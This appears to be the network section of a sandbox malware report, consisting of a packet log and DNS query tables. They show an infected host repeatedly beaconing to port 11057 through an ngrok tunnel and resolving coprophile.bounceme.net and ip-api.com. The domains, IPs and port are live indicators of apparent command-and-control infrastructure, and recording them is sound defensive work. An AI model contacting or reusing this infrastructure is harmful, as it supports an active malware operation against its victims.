                                                                                                                                                                              Jan 12, 2025 07:10:46.595360041 CET110574985118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:48.228534937 CET110574985118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:48.231308937 CET4985111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:48.434277058 CET4985111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:48.435041904 CET4986111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:48.439205885 CET110574985118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:48.439944983 CET110574986118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:48.440021992 CET4986111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:48.440375090 CET4986111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:48.445204973 CET110574986118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:50.084796906 CET110574986118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:50.085730076 CET4986111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:50.293344975 CET4986111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:50.294152975 CET4987311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:50.298197985 CET110574986118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:50.299067020 CET110574987318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:50.302418947 CET4987311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:50.302813053 CET4987311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:50.307765007 CET110574987318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:51.947438955 CET110574987318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:51.947519064 CET4987311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:52.153131962 CET4987311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:52.153894901 CET4988711057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:52.158113003 CET110574987318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:52.158777952 CET110574988718.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:52.158852100 CET4988711057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:52.159113884 CET4988711057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:52.163918018 CET110574988718.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:53.806588888 CET110574988718.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:53.806657076 CET4988711057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:54.012103081 CET4988711057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:54.012943029 CET4989911057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:54.017044067 CET110574988718.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:54.017924070 CET110574989918.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:54.017999887 CET4989911057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:54.018322945 CET4989911057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:54.023156881 CET110574989918.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:55.666084051 CET110574989918.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:55.666178942 CET4989911057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:55.872553110 CET4989911057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:55.873284101 CET4991011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:55.877337933 CET110574989918.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:55.878149986 CET110574991018.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:55.878216028 CET4991011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:55.878632069 CET4991011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:55.883500099 CET110574991018.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:57.505764961 CET110574991018.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:57.505820036 CET4991011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:57.715332031 CET4991011057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:57.716223001 CET4992511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:57.720109940 CET110574991018.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:57.721060038 CET110574992518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:57.721169949 CET4992511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:57.721386909 CET4992511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:57.726182938 CET110574992518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:59.389096975 CET110574992518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:59.389175892 CET4992511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:59.590338945 CET4992511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:59.591104031 CET4993211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:59.595123053 CET110574992518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:59.596056938 CET110574993218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:10:59.596190929 CET4993211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:59.596436977 CET4993211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:10:59.601252079 CET110574993218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:01.242368937 CET110574993218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:01.242432117 CET4993211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:01.449590921 CET4993211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:01.450305939 CET4994111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:01.454493046 CET110574993218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:01.455132008 CET110574994118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:01.455219030 CET4994111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:01.459923983 CET4994111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:01.464782000 CET110574994118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:02.367185116 CET4994780192.168.2.5208.95.112.1
                                                                                                                                                                              Jan 12, 2025 07:11:02.371959925 CET8049947208.95.112.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:02.375159979 CET4994780192.168.2.5208.95.112.1
                                                                                                                                                                              Jan 12, 2025 07:11:02.375327110 CET4994780192.168.2.5208.95.112.1
                                                                                                                                                                              Jan 12, 2025 07:11:02.380167007 CET8049947208.95.112.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:02.877388954 CET8049947208.95.112.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:02.890378952 CET4994780192.168.2.5208.95.112.1
                                                                                                                                                                              Jan 12, 2025 07:11:02.895394087 CET8049947208.95.112.1192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:02.895459890 CET4994780192.168.2.5208.95.112.1
                                                                                                                                                                              Jan 12, 2025 07:11:03.105762005 CET110574994118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:03.105815887 CET4994111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:03.308981895 CET4994111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:03.310045004 CET4995511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:03.314223051 CET110574994118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:03.314872980 CET110574995518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:03.314945936 CET4995511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:03.315233946 CET4995511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:03.320142031 CET110574995518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:04.959805012 CET110574995518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:04.960005999 CET4995511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:05.168556929 CET4995511057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:05.169301987 CET4996811057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:05.174570084 CET110574995518.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:05.175110102 CET110574996818.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:05.175190926 CET4996811057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:05.175508022 CET4996811057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:05.181153059 CET110574996818.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:06.802778959 CET110574996818.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:06.802840948 CET4996811057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:30.555031061 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.555144072 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.555165052 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.556720018 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.556749105 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.560774088 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.560815096 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.564769983 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.564799070 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.564815998 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.564826012 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.564870119 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.564882040 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.564965010 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.564980030 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565041065 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565052986 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565087080 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565098047 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565157890 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565171003 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565216064 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565228939 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565293074 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565305948 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565373898 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565387011 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565402031 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565413952 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565433025 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565450907 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565498114 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565547943 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565556049 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565582037 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565610886 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565625906 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565687895 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565704107 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565737963 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565749884 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565802097 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565814972 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565851927 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565862894 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565907001 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565929890 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.565964937 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.565979958 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566030025 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566066980 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566102982 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566118956 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566131115 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566135883 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566153049 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566163063 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566251993 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566265106 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566283941 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566291094 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566349030 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566364050 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566410065 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566426039 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.566474915 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566541910 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566610098 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566658020 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566751957 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566796064 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566884041 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566936970 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.566962004 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.571857929 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:30.572797060 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:30.577986956 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:31.166616917 CET110575001918.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:31.166770935 CET5001911057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:31.175115108 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:31.175299883 CET44350020162.159.135.232192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:31.175405025 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:31.179158926 CET50020443192.168.2.5162.159.135.232
                                                                                                                                                                              Jan 12, 2025 07:11:31.457432985 CET5001911057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:31.462291002 CET110575001918.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:31.465079069 CET5002111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:31.470005989 CET110575002118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:31.470094919 CET5002111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:31.470361948 CET5002111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:31.475168943 CET110575002118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:33.115187883 CET110575002118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:33.115375042 CET5002111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:33.324780941 CET5002111057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:33.325506926 CET5002211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:33.329649925 CET110575002118.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:33.330365896 CET110575002218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:33.330451965 CET5002211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:33.330740929 CET5002211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:33.335544109 CET110575002218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:34.976428032 CET110575002218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:34.976520061 CET5002211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:35.184088945 CET5002211057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:35.185050964 CET5002311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:35.189063072 CET110575002218.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:35.190103054 CET110575002318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:35.190191984 CET5002311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:35.190437078 CET5002311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:35.195240974 CET110575002318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:36.820236921 CET110575002318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:36.820369959 CET5002311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:37.030163050 CET5002311057192.168.2.518.153.198.123
                                                                                                                                                                              Jan 12, 2025 07:11:37.034949064 CET110575002318.153.198.123192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:11:37.040709972 CET5002411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:11:37.045525074 CET11057500243.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:08.689121962 CET11057500403.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:08.689909935 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:08.690002918 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:08.690299988 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:08.695132971 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.339994907 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.340250015 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.543399096 CET5004111057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.544101000 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.548353910 CET11057500413.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.548993111 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:10.549069881 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.549349070 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:10.554162979 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.199153900 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.199237108 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.402780056 CET5004211057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.403721094 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.407737017 CET11057500423.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.408624887 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:12.408713102 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.408946991 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:12.413817883 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.040996075 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.041102886 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.246881008 CET5004311057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.247539997 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.251810074 CET11057500433.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.252423048 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:14.252494097 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.252779007 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:14.257575035 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:15.882213116 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:15.882930040 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.090418100 CET5004411057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.091231108 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.095526934 CET11057500443.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:16.096205950 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:16.096292019 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.096533060 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:16.101340055 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:17.726883888 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:17.728424072 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.574762106 CET5004511057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.575650930 CET5004611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.579858065 CET11057500453.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:20.580503941 CET11057500463.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:20.580601931 CET5004611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.580954075 CET5004611057192.168.2.53.78.28.71
                                                                                                                                                                              Jan 12, 2025 07:12:20.585896015 CET11057500463.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:22.228754044 CET11057500463.78.28.71192.168.2.5
                                                                                                                                                                              Jan 12, 2025 07:12:22.228951931 CET5004611057192.168.2.53.78.28.71
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 12, 2025 07:10:21.935300112 CET | 50146 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 12, 2025 07:10:21.944957018 CET | 53 | 50146 | 1.1.1.1 | 192.168.2.5 |
| Jan 12, 2025 07:10:22.306783915 CET | 62454 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 12, 2025 07:10:22.315609932 CET | 53 | 62454 | 1.1.1.1 | 192.168.2.5 |
| Jan 12, 2025 07:10:25.130633116 CET | 61937 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 12, 2025 07:10:25.139559984 CET | 53 | 61937 | 1.1.1.1 | 192.168.2.5 |
| Jan 12, 2025 07:10:37.264584064 CET | 65425 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 12, 2025 07:10:37.273447990 CET | 53 | 65425 | 1.1.1.1 | 192.168.2.5 |
| Jan 12, 2025 07:11:02.358464003 CET | 61783 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 12, 2025 07:11:02.365344048 CET | 53 | 61783 | 1.1.1.1 | 192.168.2.5 |
| Jan 12, 2025 07:11:29.089546919 CET | 60060 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 12, 2025 07:11:29.096240997 CET | 53 | 60060 | 1.1.1.1 | 192.168.2.5 |
| Jan 12, 2025 07:11:37.030709982 CET | 56485 | 53 | 192.168.2.5 | 1.1.1.1 |
| Jan 12, 2025 07:11:37.039302111 CET | 53 | 56485 | 1.1.1.1 | 192.168.2.5 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 12, 2025 07:10:21.935300112 CET | 192.168.2.5 | 1.1.1.1 | 0x3727 | Standard query (0) | coprophile.bounceme.net | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:10:22.306783915 CET | 192.168.2.5 | 1.1.1.1 | 0x514b | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:10:25.130633116 CET | 192.168.2.5 | 1.1.1.1 | 0xf971 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:10:37.264584064 CET | 192.168.2.5 | 1.1.1.1 | 0xc007 | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:02.358464003 CET | 192.168.2.5 | 1.1.1.1 | 0x9dab | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |
